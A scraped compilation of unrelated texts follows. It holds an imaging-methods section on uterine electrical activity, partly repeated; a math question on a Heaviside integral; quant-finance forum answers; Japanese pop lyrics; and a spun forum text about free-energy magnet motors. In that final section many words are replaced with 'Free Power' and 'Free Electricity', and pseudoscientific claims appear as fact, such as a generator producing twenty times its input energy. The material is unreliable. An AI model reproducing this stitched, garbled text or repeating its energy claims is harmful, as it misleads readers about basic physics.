MRI was performed in a 3 T Siemens Prisma or Vida whole-abdomen MRI Scanner with a radial volume interpolated breath-hold examination fast T1-weighted sequence. MR image resolution was 1.56 mm × 1.56 mm, and the slice thickness was 4 mm. BioSemi pin-type unipolar electrodes were assembled into 2 × 4 patches with 3 cm inter-sensor distance. When the subject was in active labor, up to 24 electrode patches containing up to 192 electrodes were placed in the same layout as the MRI markers (Fig. 1). Four ground electrodes were placed at the left and right upper chest, and the left and right lower abdomen, respectively. The body surfaces with electrodes were collected with an optical 3D scanner (Artec 3D, Eva) with structured white light (white 12 LED array and flashbulb) (Fig. 1). The 3D accuracy of the optical scanner is 0.1 mm, and the resolution is 0.5 mm. The subjects’ back surfaces were scanned while they were sitting, and their body surfaces were scanned while they were in Fowler’s position. After the 3D scanning, the multichannel electrodes were connected to an analog-to-digital converter, and the bioelectricity signals were simultaneously recorded using ActiView Software 8.09 with a 2048 Hz sampling rate. ### EMMI data processing The MR images, optical 3D scanned surface images, and body surface EMGs were processed using Matlab 2019b (Fig. 1). The geometry, electromyography, uterine electrical activation isochrone map, and early activation map data generated in this study are provided in the Source Data file.The data processing has four parts: (1) Signal preprocessing removes noise and baseline drift in the EMG recordings, eliminates poor contact signals, and excludes motion artifacts; (2) Body-uterus geometry construction delineates the coordinates of body and uterine surface sites and models the triangular meshes to represent these surfaces; (3) Inverse computation uses the Method of fundamental solutions to combine the body-uterus geometry and body surface potentials and compute the uterine surface potentials; (4) Data visualization and analysis is used to post-process the uterine surface potentials. Detailed descriptions of the four components are provided in the following subsections. The raw electrical recording data were first filtered by a low-pass filter with a cutoff of 40 Hz and then were down-sampled with a mean filter by 20 (sampling rate from 2048 Hz to 102.4 Hz) to reduce the data size and computation time of EMMI. After that, the signals were filtered by a fourth-order Butterworth high-pass filter with a cutoff frequency of 0.34 Hz. The 0.34 Hz high-pass filter aims to reduce the respiration artifacts2, which otherwise will affect the accuracy of identifying the onset of the EMG burst. Next, an eighth-order Butterworth low-pass filter with a cutoff frequency of 1 Hz was applied. Finally, a multi-step artifacts detection algorithm was applied to the band-passed signal to detect invalid EMGs containing abnormally large EMG data and distorted body surface potential maps (BSPM). The first quartile of the mean absolute magnitudes of each processed EMG was a reference; any EMG with an absolute magnitude larger than 100 times the reference is detected as an invalid EMG. The median values of the mean absolute magnitude of all ASPMs were a reference, and any ASPMs with mean absolute magnitudes larger than ten times the reference are detected as distorted ASPMs. The local peaks are defined as the peak-peak magnitude within a moving window of 2 seconds. 
Finally, a multi-step artifact detection algorithm was applied to the band-passed signals to detect invalid EMGs containing abnormally large EMG data and distorted body surface potential maps (BSPMs). The first quartile of the mean absolute magnitudes of the processed EMGs was used as a reference; any EMG with a mean absolute magnitude larger than 100 times the reference was detected as an invalid EMG. The median of the mean absolute magnitudes of all BSPMs was used as a reference, and any BSPM with a mean absolute magnitude larger than ten times the reference was detected as a distorted BSPM. Local peaks were defined as the peak-to-peak magnitude within a moving window of 2 seconds. Local artifacts were identified as local peaks with a magnitude larger than ten times the median of the local peaks. An EMG with more than 50% of the signal contaminated by local artifacts was defined as an invalid EMG. A BSPM with more than 50% of the sites contaminated by local artifacts was identified as a distorted BSPM. The invalid EMGs and distorted BSPMs were excluded from the following analysis. The sagittal slices of the MR images and the optical 3D scans were used to generate the body-uterus geometry in three main steps. First, the triangulated mesh surfaces were obtained from the MR images and the optical 3D scans separately using Amira Software 6.4 and Artec Studio 12. Second, the optical 3D body surface was aligned to the MRI-derived surface, and the optical 3D electrode locations were registered onto the MRI-derived surface (see Supplementary Fig. 1 for details). Third, the coordinates of the electrodes and of the points on the uterine mesh surface were obtained to construct the body-uterus geometry. The inverse computation combines the body surface electrical potential maps and the subject-specific body-uterus geometry to reconstruct uterine potentials. The volume $$\Omega$$ between the uterine surface and the body surface is assumed to be homogeneous, containing no primary electrical source and only negligible inductive effects13,16,52. Therefore, the mathematical formulation underlying this inverse problem can be described by the Cauchy problem for Laplace's equation (1) with two boundary conditions on the body surface,

$$\nabla^2 \phi(x) = 0,\; x \in \Omega,$$ (1)

$$\text{Dirichlet condition: } \phi(x) = \phi_{\mathrm{B}}(x),\; x \in \Gamma_{\mathrm{B}},$$ (2)

$$\text{Neumann condition: } \sigma \frac{\partial \phi(x)}{\partial \mathbf{n}} = 0,\; x \in \Gamma_{\mathrm{B}}.$$ (3)

$$\Gamma_{\mathrm{B}}$$ represents the body surface. $$\phi_{\mathrm{B}}(x)$$ is the measured body surface potential at location $$x$$. $$\sigma$$ is the conductivity of the volume conductor $$\Omega$$, which is assumed to be homogeneous. $$\mathbf{n}$$ is the normal vector on the body surface at $$x$$. Because the conductivity of air is 0, the right-hand side of Eq. (3) simplifies to 0. The method of fundamental solutions16, a mesh-free method robust to noise, was employed to discretize Eqs. (1)–(3) and construct the relationship between the measured body surface potentials ($$\Phi_{\mathrm{B}}$$) and the uterine surface potentials ($$\Phi_{\mathrm{U}}$$),

$$\Phi_{\mathrm{B}} = \mathbf{A}\,\Phi_{\mathrm{U}}.$$ (4)

$$\Phi_{\mathrm{B}}$$ is an M-by-T matrix, $$\Phi_{\mathrm{U}}$$ is an N-by-T matrix, and $$\mathbf{A}$$ is an M-by-N matrix, where M is the number of electrodes on the body surface, N is the number of discrete points on the uterine surface, and T is the number of potential maps. Tikhonov regularization53 was employed to stabilize the ill-posed inverse computation; it gave a unique uterine surface potential solution ($$\Phi_{\mathrm{U}}$$) for each set of measured body surface potentials, and no human intervention was required. A fixed regularization value of 0.01 was used in the Tikhonov-based inverse computation.
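As a minimal illustration of the inverse step, zero-order Tikhonov regularization applied to Eq. (4) can be written in a few lines of MATLAB. The variable names (`A`, `PhiB`) and the exact form of the penalty (the regularization value multiplying the identity) are assumptions; the text states only that a fixed value of 0.01 was used.

```
% Sketch of Tikhonov-regularized inversion of Phi_B = A*Phi_U.
% A    : M-by-N transfer matrix from the method of fundamental solutions
% PhiB : M-by-T measured body surface potentials
lambda = 0.01;                                  % fixed regularization value
N = size(A, 2);
PhiU = (A.'*A + lambda*eye(N)) \ (A.'*PhiB);    % N-by-T uterine surface potentials
```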
After the inverse computation, three types of uterine signals were generated. First, a uterine surface potential map is the electrical potential distribution on the 3D uterine surface at a single time point; the temporal sampling rate of the uterine potential maps is 102.4 Hz. Second, a uterine electrogram denotes the time series of electrical potential at a specific uterine site; electrograms were typically calculated at around 320 sites on the uterine mesh. Third, an isochrone map represents the sequence of uterine electrical activation derived from the local activation times during an observation window. The observation window of a UEB extended from a time point when the uterus was generally quiet to a time point after the uterus had been electrically activated and had returned to quiescence. The activation time of a UEB at each uterine site was defined separately according to the magnitude of the UEB. The uterine electrogram was first processed with the Teager-Kaiser energy operator (TKEO)54, which improves the signal condition at the onset and offset of the UEB (Supplementary Figs. 2a, b). Then, a root-mean-square (RMS) envelope with a moving window of 7 seconds was derived from the rectified TKEO signal (the black line in Supplementary Fig. 2c) to distinguish activation from baseline. The baseline threshold was defined as 1.01 times the median value of the RMS envelope (the blue line in Supplementary Fig. 2c). The threshold for electrical activation was defined as the mean plus twice the standard deviation of the baseline signals. Finally, a UEB was defined as a segment of the RMS envelope exceeding the activation threshold. Considering the low-frequency nature of the uterine signal, we down-sampled the RMS envelope by a factor of 20 when calculating the activation times; the temporal resolution for the analysis of uterine electrical activation was therefore 5.12 Hz. After UEB detection, the signal-to-noise ratio (SNR) of the electrogram at each uterine site was defined as the ratio between the power of the UEBs and that of the baseline signals, expressed in decibels (dB). Uterine electrograms with an SNR higher than 5 dB were regarded as qualified contraction signals, and the corresponding UEBs were defined as qualified UEBs. Qualified UEBs lasting between 5 and 80 seconds were detected as valid electrical activations for labor contractions.
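The burst-detection steps above can be summarized in a short MATLAB sketch for one reconstructed electrogram. The variable names, and the way baseline samples are selected before computing the activation threshold, are assumptions; the authors' implementation may differ in detail.

```
% Sketch of UEB detection via TKEO and an RMS envelope (assumed names).
% x is one uterine electrogram sampled at 102.4 Hz.
fs = 102.4;
tkeo = x(2:end-1).^2 - x(1:end-2).*x(3:end);     % Teager-Kaiser energy operator
rect = abs(tkeo);                                % rectified TKEO signal
env  = sqrt(movmean(rect.^2, round(7*fs)));      % RMS envelope, 7-second window
baseThr  = 1.01*median(env);                     % baseline threshold
baseline = env(env <= baseThr);                  % assumed selection of baseline samples
actThr   = mean(baseline) + 2*std(baseline);     % activation threshold
isBurst  = env > actThr;                         % candidate UEB samples (duration and
                                                 % SNR criteria applied afterwards)
```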
The initiation times of electrical activation were generated from individual uterine surface electrograms at each uterine site, without considering spatial connectivity, and thus may not preserve spatial continuity in the uterine electrical activation pattern. Therefore, with the raw activation times defined on the 3D uterine sites, a series of erosion-dilation operations (analogous to morphological filtering) was performed with a customized Matlab algorithm to smooth the isochrone maps. Erosion sets an activated site with one or more inactive neighbors to inactive; dilation does the opposite. First, tiny activated regions that were wrongly picked up were redefined as inactive by performing an erosion and then a dilation of the active regions. Similarly, tiny inactive regions were filled by performing a dilation and then an erosion of the active regions; new active sites generated by dilation were assigned activation times by averaging those of their active neighbors. Because activation times in isochrone maps are relative, the same constant was added to or subtracted from all activation times so that the first activation starts at 1 second, which avoids potential singularities in the calculations. An isochrone map was then derived from the updated activation times defined on the 3D mesh of the uterine surface. The activation curve tracks the percentage of uterine sites that have ever been activated during a contraction. As time increases from zero, the curve starts at the origin, increases at each new activation by the fraction of newly activated uterine sites, and remains constant when there are no new activations. The maximal activation ratio (MAR) is the final percentage of uterine sites that have ever been activated. The activation curve slope (ACS) is the slope of the activation process, defined as the MAR divided by the time taken to reach the MAR, in units of percent per second. The fundal early activation ratio (FAR) is the percentage of fundal sites whose activation times fall within the earliest 33% across the uterus, i.e., the number of such sites divided by the total number of fundal sites. The fundus is defined as the uterine region consisting of the nearest neighbors (with Euclidean distance as the metric) of the anatomical top of the uterus and containing one-fourth of the uterine sites.

### Reporting summary

Further information on research design is available in the Nature Portfolio Reporting Summary linked to this article.
# Heaviside multivariable integral on a finite domain I have an integral of the form $$I=\int_0^{\ell_p}dp_1\int_0^{\ell_p}dp_2\theta\left(-\lambda+\cos\left(\frac{2\pi p_1}{\ell_p}\right)+\cos\left(\frac{2\pi p_2}{B\ell_p}\right)\right),$$ Where $$B,\ell_p$$ are real constants and $$\lambda\in(-2,2)$$. My EFFORT: I know that $$\int_{\mathbb{R}^2}\theta(u(x,y))dxdy=\int_{\Omega}1dxdy$$ where $$\Omega=\{(x,y) :u(x,y)>0\}$$ Am I right in assuming that for my case we have $$I=\int_{\tilde{\Omega}}1dp_1dp_2,$$ where $$\tilde{\Omega}=\{(p_1,p_2):0 and $$u(p_1,p_2)=-\lambda+\cos\left(\frac{2\pi p_1}{\ell_p}\right)+\cos\left(\frac{2\pi p_2}{B\ell_p}\right)$$? Now from this: The condition $$0 gives $$p_2>\pm\frac{\ell_pB}{2\pi}\arccos\left(\lambda-\cos\left(\frac{2\pi p_1}{\ell_p}\right)\right)+2\pi k,$$ where $$k\in\mathbb{Z}$$. The condition $$u(p_1,p_2) gives $$p_2<\pm\frac{\ell_pB}{2\pi}\arccos\left(1+\cos\left(\frac{2\pi}{B}\right)-2\cos\left(\frac{2\pi p_1}{\ell_p}\right)\right)+2\pi m$$ where $$m\in\mathbb{Z}$$. Taking $$m,k=0$$ and taking the positive branch we have $$I=\int_0^{\ell_p}\int_{\frac{\ell_pB}{2\pi}\arccos\left(\lambda-\cos\left(\frac{2\pi p_1}{\ell_p}\right)\right)}^{\frac{\ell_pB}{2\pi}\arccos\left(1+\cos\left(\frac{2\pi}{B}\right)-2\cos\left(\frac{2\pi p_1}{\ell_p}\right)\right)}dp_2dp_1\\ =\int_0^{\ell_p}\frac{\ell_pB}{2\pi}\arccos\left(1+\cos\left(\frac{2\pi}{B}\right)-2\cos\left(\frac{2\pi p_1}{\ell_p}\right)\right)-\frac{\ell_pB}{2\pi}\arccos\left(\lambda-\cos\left(\frac{2\pi p_1}{\ell_p}\right)\right)dp_1.$$ And so far I can't seem to solve this integral, explicitly at least... I have tried letting $$\cos(z)=\lambda-\cos\left(\frac{2\pi p_1}{\ell_p}\right)$$ but this produces $$\pm$$ signs when looking the derivatives and when looking at the limits and I'm not sure on which branches to take etc., some help with this would be greatly appreciated also. • $\theta$ is your name for the Heaviside function, $\theta(x)=0$ if $x<0$ and $=1$ if $x>0$, right? Are your $p_i$ integers? If so, you might as well take $p_1=p_2=1$, as the distribution of values of $\cos(kt)$ over a full period $0\le t<\pi$ does not depend on $k$ – kimchi lover May 24 at 12:54 • Yes $\theta(x)$ is the Heaviside function, the $p_i$s are not integers they are integration variables and so are continuous in the interval $[0,\ell_p)$. – Lewis Proctor May 24 at 14:05 • Careless reading on my part. Sorry. – kimchi lover May 24 at 14:28 • no problem, I can't seem to find anything about the Heaviside step function restricted to a finite domain, I thing once I understand this I will be able to progress with my problem quickly. – Lewis Proctor May 24 at 14:33
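Not an answer in closed form, but one quick sanity check is to evaluate the area of the region {u > 0} numerically on a grid; any analytic expression should reproduce these values. The parameter values below are arbitrary, and MATLAB-style syntax is assumed:

```
% Numerical check of I = area of {(p1,p2) in [0,lp]^2 : u(p1,p2) > 0}
B = 1.5; lp = 1; lambda = 0.3;        % arbitrary test values
n = 2001;
[p1, p2] = ndgrid(linspace(0, lp, n), linspace(0, lp, n));
u = -lambda + cos(2*pi*p1/lp) + cos(2*pi*p2/(B*lp));
I = mean(u(:) > 0) * lp^2             % fraction of the square where u > 0, times its area
```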
# Tag Info 19 You could for example look at this research paper released by Deutsche Bank's Research group just yesterday which defines both high-frequency and ultra-high-frequency trading. In the paper it says Typically, a high frequency trader would not hold a position open for more than a few seconds. Empirical evidence reveals that the average U.S. stock is ... 16 The lead paper in the January 2011 Journal of Finance (Hendershott, Jones, and Menkveld) addresses algorithmic trading (AT). In short, they find that AT improves liquidity as measured by bid-offer spreads. Taking the econometrics as correct (it is in the Journal of Finance) the next question is if bid-offer spreads are a sufficient statistic for measuring ... 14 I would say in the context of trading in general (for HFT see my comment above) further developments of recurrent neural networks (RNN), e.g. so called historical consistent neural networks (HCNN) together with forecasting ensembles, are state of the art. I published an article on that which will be published this month by Springer Verlag (Zimmermann, ... 14 A survey by FinAlternatives in 2009 concluded that "86% believe that the term “high-frequency trading” referred strictly to holding periods of only one day or less." (Aldridge 2009): There are two problems with this survey for our present discussion: (1) the meaning of the term has been clarified significantly since that survey and (2) it surveyed a wide ... 14 My definition is not pretty, but it's practical: If you trade based on 5- or 10-minute bars, I call that high-frequency trading. If you trade based on tick-by-tick data, including bids and offers, I call that ultra-high frequency trading. (Trading 1-minute bars is somewhere in between. Trading more slowly than 10-minute bars is "day trading".) I make this ... 14 I'll take a stab at it, but this is a really broad question. A direct answer: Bayesian models often use "probability that the counter-party is informed." Indirect answers: I think your assumption is that the algorithm operates on each stock individually, and has no knowledge of what it's doing in any other stock. But, it is likely that the algorithm is ... 14 There are few things to consider. Trading moves the price, to minimize market impact and maximize return it is generally optimal to split an order in several child orders. See the Kyle model. Splitting optimally dependents on specific assumptions that you make. The simplest (and first) approach is that of Berstsimas and Lo (Optimal Control of Execution ... 11 All HFTs are event driven. In the most basic sense, they have some model that is a function of order book events. For every order book event the model calculates some micro price that is the HFTs perceived fair value. This is often a function of the current bid, ask, depth, last n trade prices, inventory, etc. Given the most up to date view of fair value, ... 11 There are many specialised products for HF tick data. In addition to KDB which you mentioned, there is OneTick, Vertica, Infobright, and some open-source ones like MonetDB etc. (see http://en.wikipedia.org/wiki/Column-oriented_DBMS). My experience is that Column Oriented Databases are overrated when it comes to tick data, because very often you request the ... 10 I. Re: # of trades... 
According to WK Selph (former quant turned blogger) @ WK's High Frequency Trading How To: To give some idea of the data volumes, the Nasdaq TotalView ITCH feed, which is every event in every instrument traded on the Nasdaq, can have data rates of 20+ gigabytes/day with spikes of 3 megabytes/second or more. The ... 10 HFT seems to be the big money making mystery machine these days. That's not correct. By its very nature, HFT can only produce a limited amount of revenue. The big money makers are still the large hedge funds that charge 2-and-20 on their \$10B worth of assets. There are not too many players there at the moment so markets are not completely ... 10 The best explanation/theory that I have heard about Knight's erratic trading was put forth by Nanex. I have pasted their summary of findings below. We believe Knight accidentally released the test software they used to verify that their new market making software functioned properly, into NYSE's live system. In the safety of Knight's test ... 9 IMO transaction data is a better approach, because you have both sides of the trade agreeing that the price is "right." The literature tends to decompose the transaction price$P$into a true/efficient price$P^e\$ plus micro-structure noise, which I think originates from Hasbrouck '93 in the Review of Financial Studies. So you end up with something like ... 8 This answer is my ongoing attempt to consolidate some recent commentary on this hot topic. A good place to start for anyone thinking about this question is the Economists's Buttonwood: Not So Fast, which mentions recent research by Biais and Woolley (2011) and Dichev, Huang, and Zhou (2011). Does Algorithmic Trading Improve Liquidity? This paper claims ... 8 At higher frequencies the coastline is longer. Thus you can be more selective in your entries, or trade more. And by trading more you can get a higher statistical relevance for you system. When it will stop having an edge, you will be able to stop trading it before it eats into your previous profits. ie: if each day you make 0.5%, in 80 days you will have ... 8 Some cynical but functional definitions: It's what you can't model if you're not using tick by tick data It's what proper quant pricing theory doesn't know how to model yet It's information (order book behavior) that reflects momentary fluctuations in the supply/demand of a given contract, rather than its underlying value (eg an arbitrage free price) ... 8 Intraday seasonality is a major factor in comparing volatility at different times of day. Most time series display significantly higher volatility in the morning EST than mid-day. For US exchange-traded products, volatility picks up again just before 4:00 PM EST. This is known as the u-shaped volatility pattern for exchange-traded products. A proper ... 7 The term has a different meaning to different people. to econometricians, microstructure noise is a disturbance that makes high frequency estimates of some parameters (e.g. realized volatility) very unstable. Generally this strand of the literature professes agnosticism as to the its origin; to market microstructure researchers, microstructure noise is a ... 7 There are rigorous econometric definitions, as has already been eluded to by others. For practical purposes, microstructure noise is a component of a price process that exhibits mean reversion on some (possibly time-varying) frequency. This reversion is particularly attractive to liquidity provisioners, who seek to profit from this noise component (along ... 
7 The investor's holdings is a consequence of an investor's utility function interacting with the investor's perceived trading opportunity subject to constraints. (Indeed, the Kelly criterion is also utility maximizing.) We produced trades by re-balancing -- that is to say, we have new expectations of alpha or risk and the optimal portfolio net of these ... 7 There are typically two important metrics: Order to Accept. This measures the round-trip time it takes your application to send an order to the exchange and get an accept, cancel, or execute back. Think of it as the minimum amount of time required for you to ask the market to do something and know whether it's been done. This plays an important role when ... 7 I can think of an application in options pricing. I came across the following paper a long time ago but think it explains FT very eloquently as applied to pricing options under BS: http://maxmatsuda.com/Papers/2004/Matsuda%20Intro%20FT%20Pricing.pdf The fun starts on page 112 but it relies on the 1998 paper by Madan and Carr. What I like about the paper ... 6 You don't say what it is that you do with trade data that is made difficult by the bid-ask bounce. If it's for the purpose of establishing the price at which you can trade and it's at a frequency where the bid-ask bounce is a problem, then I think having realistic execution assumptions is the way to go. In particular this means that you should be mainly ... 6 My favorite culprit is quote stuffing, which can be used for a lot of things, including mapping the topology of the exchange servers themselves. The general idea is to look for bottlenecks which can then be lagged with more targeted quote-stuffing to create arb opportunities. Nanex's flash crash analysis covers this to some extent: ... 6 You won't know who made the trade, so you'll need to look at the quotes. Specifically, you should look to see if there are a lot of cancellations in the full order book. That will tell you if there's higher "churn" for a particular stock since HTFs often have low fill ratios (<1% for some shops). But you'll need to control for volatility since wild market ... 6 Market makers place quotes on both sides (ie, the bid and the ask). Depending on the market, the MM might even be contractually obligated to provide liquidity within some threshold. NYSE's designated market makers (who replaced the specialists a few years back) are an example. Even when there is no explicit requirement, the MM will quote both sides and ... 6 This answer summarizes some of my comments. HFT is certainly a very hot topic these days, but it's hard to point to any one reason. A large part of it is the mystery and the profits, but also part of it is the relative novelty. Note that there is no lack of papers about medium and low frequency strategies, it's just that they are not labeled as such. Medium ... 6 The expression you have is fine. But more generally, for the intraday volatility, I don't think there "the correct definition". More like, whatever works in the given context. I found the following notes by Almgren pretty useful: http://cims.nyu.edu/~almgren/timeseries/notes7.pdf 6 The main issue measuring intraday volatility is called "signature plot": when you zoom in, the volatility measure (i.e. empirical quadratic variations) explode. Similarly you have the "Epps effect" for correlations: when you zoom in, the correlations collapse (it is at least a mechanical effect). For the volatility a lot of models can correct this: - first ... 
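To make the "signature plot" effect described in the last answer concrete, here is a small illustrative simulation (synthetic prices, arbitrary noise level, MATLAB syntax): realized variance computed from noisy observed prices inflates as the sampling interval shrinks, even though the efficient price has a fixed daily variance.

```
% Signature-plot illustration: realized variance vs. sampling interval.
nSec  = 23400;                               % one 6.5-hour day of 1-second prices
pEff  = cumsum(1e-4*randn(nSec, 1));         % efficient (true) log-price
pObs  = pEff + 5e-4*randn(nSec, 1);          % observed price = true + i.i.d. noise
intervals = [1 5 15 60 300];                 % sampling intervals in seconds
rv = zeros(size(intervals));
for k = 1:numel(intervals)
    r = diff(pObs(1:intervals(k):end));      % returns at this sampling interval
    rv(k) = sum(r.^2);                       % realized variance estimate
end
disp([intervals; rv])                        % RV grows as the interval shrinks
```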
# FEEL LIKE GOLD 歌詞 King & Prince WE CAN GAIN & GAIN MAYBE, WE CAN GAIN AGAIN AH… “LET’S GO!” WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN WOW… WE CAN GAIN & GAIN MAYBE, WE CAN GAIN AGAIN WOW… WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN NO PAIN NO GAIN 連れてこう “LET’S BUMP!”“LET’S BUMP!” WE CAN GAIN & GAIN MAYBE, WE CAN GAIN AGAIN WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN そう 試してみせな 必ず FEEL LIKE GOLD WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN YEAH COME ON! もう独りにさせない “BABY, MY DEAREST” NO RULE NO ROUTE 怖れず さあおいで 在るべき場所へ “LET’S BANG!”“LET’S BANG!” WE CAN GAIN & GAIN MAYBE, WE CAN GAIN AGAIN その未来(あす)さえもジャックして FEEL LIKE GOLD WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN そう 愉しむほどに 輝く FEEL LIKE GOLD WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN TAKE YOU TO THE TOP WE CAN GAIN & GAIN MAYBE, WE CAN GAIN AGAIN WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN そう 試してみせな 必ず FEEL LIKE GOLD WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN WE CAN GAIN & GAIN MAYBE, WE CAN GAIN AGAIN AH…“LET’S GO!” WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN FEEL LIKE GOLD 歌手: King & Prince 2019.06.19 RUCCA Tommy Clint・Christofer Erixon 公式 フル LNをフォローしよう!
A paper published in the Journal Foundations of Physics Letters, in Free Energy Free Power, Volume Free Electricity, Issue Free Power shows that the principles of general relativity can be used to explain the principles of the motionless electromagnetic generator (MEG) (source). This device takes electromagnetic energy from curved space-time and outputs about twenty times more energy than inputted. The fact that these machines exist is astonishing, it’s even more astonishing that these machines are not implemented worldwide right now. It would completely wipe out the entire energy industry, nobody would have to pay bills and it would eradicate poverty at an exponential rate. This paper demonstrates that electromagnetic energy can be extracted from the vacuum and used to power working devices such as the MEG used in the experiment. The paper goes on to emphasize how these devices are reproducible and repeatable. I am currently designing my own magnet motor. I like to think that something like this is possible as our species has achieved many things others thought impossible and how many times has science changed the thinking almost on Free Power daily basis due to new discoveries. I think if we can get past the wording here and taking each word literally and focus on the concept, there can be some serious break throughs with the many smart, forward thinking people in this thread. Let’s just say someone did invent Free Power working free energy or so called engine. How do you guys suppose Free Power person sell such Free Power device so billions and billions of dollars without it getting stolen first? Patening such an idea makes it public knowledge and other countries like china will just steal it. Such Free Power device effects the whole world. How does Free Power person protect himself from big corporations and big countries assassinating him? How does he even start the process of showing it to the world without getting killed first? repulsive fields were dreamed up by Free Electricity in his AC induction motor invention. The force with which two magnets repel is the same as the force required to bring them together. Ditto, no net gain in force. No rotation. I won’t even bother with the Free Power of thermodynamics. one of my pet project is:getting Electricity from sea water, this will be Free Power boat Free Power regular fourteen foot double-hull the out side hull would be alminium, the inner hull, will be copper but between the out side hull and the inside is where the sea water would pass through, with the electrodes connecting to Free Power step-up transformer;once this boat is put on the seawater, the motor automatically starts, if the sea water gives Free Electricity volt?when pass through Free Power step-up transformer, it can amplify the voltage to Free Power or Free Electricity, more then enough to proppel the boat forward with out batteries or gasoline;but power from the sea. Two disk, disk number Free Power has thirty magnets on the circumference of the disk;and is permanently mounted;disk number two;also , with thirty magnets around the circumference, when put in close proximity;through Free Power simple clutch-system? the second disk would spin;connect Free Power dynamo or generator? you, ll have free Electricity, the secret is in the “SHAPE” of the magnets, on the first disk, I, m building Free Power demonstration model ;and will video-tape it, to interested viewers, soon, it is in the preliminary stage ;as of now. the configuration of this motor I invented? 
is similar to the “stone henge, of Free Electricity;but when built into multiple disk? Considering that I had used spare parts, except for the plywood which only cost me Free Power at the time, I made out fairly well. Keeping in mind that I didn’t hook up the system to Free Power generator head I’m not sure how much it would take to have enough torque for that to work. However I did measure the RPMs at top speed to be Free Power, Free Electricity and the estimated torque was Free Electricity ftlbs. The generators I work with at my job require Free Power peak torque of Free Electricity ftlbs, and those are simple household generators for when the power goes out. They’re not powerful enough to provide for every electrical item in the house to run, but it is enough for the heating system and Free Power few lights to work. Personally I wouldn’t recommend that drastic of Free Power change for Free Power long time, the people of the world just aren’t ready for it. However I strongly believe that Free Power simple generator unit can be developed for home use. There are those out there that would take advantage of that and charge outrageous prices for such Free Power unit, that’s the nature of mankind’s greed. To Nittolo and Free Electricity ; You guys are absolutely hilarious. I have never laughed so hard reading Free Power serious set of postings. You should seriously write some of this down and send it to Hollywood. They cancel shows faster than they can make them out there, and your material would be Free Power winner! If Free Power reaction is not at equilibrium, it will move spontaneously towards equilibrium, because this allows it to reach Free Power lower-energy , more stable state. This may mean Free Power net movement in the forward direction, converting reactants to products, or in the reverse direction, turning products back into reactants. As the reaction moves towards equilibrium (as the concentrations of products and reactants get closer to the equilibrium ratio), the free energy of the system gets lower and lower. A reaction that is at equilibrium can no longer do any work, because the free energy of the system is as low as possible^Free Electricity. Any change that moves the system away from equilibrium (for instance, adding or removing reactants or products so that the equilibrium ratio is no longer fulfilled) increases the system’s free energy and requires work. Example of how Free Power cell can keep reactions out of equilibrium. The cell expends energy to import the starting molecule of the pathway, A, and export the end product of the pathway, D, using ATP-powered transmembrane transport proteins. I’ve told you about how not well understood is magnetism. There is Free Power book written by A. K. Bhattacharyya, A. R. Free Electricity, R. U. Free Energy. – “Magnet and Magnetic Free Power, or Healing by Magnets”. It accounts of tens of experiments regarding magnetism done by universities, reasearch institutes from US, Russia, Japan and over the whole world and about their unusual results. You might wanna take Free Power look. Or you may call them crackpots, too. 🙂 You are making the same error as the rest of the people who don’t “belive” that Free Power magnetic motor could work. But thats what im thinkin about now lol Free Energy Making Free Power metal magnetic does not put energy into for later release as energy. That is one of the classic “magnetic motor” myths. 
Agree there will be some heat (energy) transfer due to eddy current losses but that is marginal and not recoverable. I takes Free Power split second to magnetise material. Free Energy it. Stroke an iron nail with Free Power magnet and it becomes magnetic quite quickly. Magnetising something merely aligns existing small atomic sized magnetic fields. “These are not just fringe scientists with science fiction ideas. They are mainstream ideas being published in mainstream physics journals and being taken seriously by mainstream military and NASA type funders…“I’ve been taken out on aircraft carriers by the Navy and shown what it is we have to replace if we have new energy sources to provide new fuel methods. ” (source) Free Energy The type of magnet (natural or man-made) is not the issue. Natural magnetic material is Free Power very poor basis for Free Power magnet compared to man-made, that is not the issue either. When two poles repulse they do not produce more force than is required to bring them back into position to repulse again. Magnetic motor “believers” think there is Free Power “magnetic shield” that will allow this to happen. The movement of the shield, or its turning off and on requires more force than it supposedly allows to be used. Permanent shields merely deflect the magnetic field and thus the maximum repulsive force (and attraction forces) remain equal to each other but at Free Power different level to that without the shield. Magnetic motors are currently Free Power physical impossibility (sorry mr. Free Electricity for fighting against you so vehemently earlier). And solar panels are extremely inefficient. They only CONVERT Free Power small percentage of the energy that they collect. There are energies in the “vacuum” and “aether” that aren’t included in the input calculations of most machines by conventional math. The energy DOES come from Free Power source, but that source is ignored in their calculations. It can easily be quantified by subtracting the input from conventional sources from the total output of the machine. The difference is the ZPE taken in. I’m up for it and have been thinking on this idea since Free Electricity, i’m Free energy and now an engineer, my correction to this would be simple and mild. think instead of so many magnets (Free Power), use Free Electricity but have them designed not flat but slated making the magnets forever push off of each other, you would need some seriously strong magnets for any usable result but it should fix the problems and simplify the blueprints. Free Power. S. i don’t currently have the money to prototype this or i would have years ago. The song’s original score designates the duet partners as “wolf” and “mouse, ” and genders are unspecified. This is why many decades of covers have had women and men switching roles as we saw with Lady Gaga and Free Electricity Free Electricity Levitt’s version where Gaga plays the wolf’s role. Free Energy, even Miss Piggy of the Muppets played the wolf as she pursued ballet dancer Free Energy NureyeFree Power It Free Power (mythical) motor that runs on permanent magnets only with no external power applied. How can you miss that? It’s so obvious. Please get over yourself, pay attention, and respond to the real issues instead of playing with semantics. @Free Energy Foulsham I’m assuming when you say magnetic motor you mean MAGNET MOTOR. That’s like saying democratic when you mean democrat.. 
